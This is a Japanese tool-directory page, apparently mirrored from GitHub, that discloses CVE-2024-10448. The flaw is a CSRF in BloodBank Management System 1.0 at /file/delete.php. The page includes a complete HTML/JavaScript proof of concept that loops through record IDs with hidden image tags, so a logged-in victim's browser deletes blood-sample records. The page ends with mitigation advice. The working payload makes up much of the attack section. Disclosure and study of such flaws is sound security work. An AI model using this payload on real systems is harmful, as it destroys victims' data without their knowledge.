Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10448 — 血液銀行 CSRF攻撃 POC | Kitploit
ツール/GitHubGitHub/bevennyamande/cve-2024-10448
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

血液銀行 CSRF攻撃 POC

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

影響を受けるバージョン:

  • BloodBank Management System: 1.0

脆弱性情報:

  • 脆弱性タイプ: クロスサイトリクエストフォージェリ (CSRF)
  • 深刻度: HIGH
  • ステータス: 未修正

脆弱性エンドポイント:

  • パス: /file/delete.php?bid=

脆弱性の説明:

BloodBank Management System の 献血リクエスト機能 において、クロスサイトリクエストフォージェリ (CSRF) の脆弱性が発見されました。この欠陥は、パス /file/delete.php?bid= に delete リクエストを送信する際に発生し、bid パラメータによってアプリケーション上の削除対象レコードを選択できるようになります。ただし、bid は血液サンプルの追加に応じて動的に変化するため、リクエストを成功させるために、ループ内で JavaScript で生成された画像タグを使用しました。

悪用に成功すると、被害者の代わりに 不正な操作(例:データの削除) が実行される可能性があります。また、ペイロードが埋め込まれた悪意のあるWebサイトにアクセスすることでも悪用される可能性があります。


概念実証 (PoC):

以下は、bid パラメータを介して 利用可能な血液サンプル を削除する CSRF PoC攻撃 の例です。攻撃者が管理するドメイン(ここでは localhost を使用)上にファイルをホストします。

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


ビデオ PoC

  • video link

影響:

  • データ操作: 攻撃者はユーザーに表示される内容を改ざんする可能性があります。
  • 風評被害: 悪意のある動作により、システムに対するユーザーの信頼が損なわれる可能性があります。

緩和策の推奨事項:

  1. CSRFトークンの使用: クロスドメインアクセスを防ぐ仕組みを実装するか、リクエストに csrf トークン を含め、さらに状態変更アクションに GET リクエストを使用しないようにしてください。
ツールをダウンロード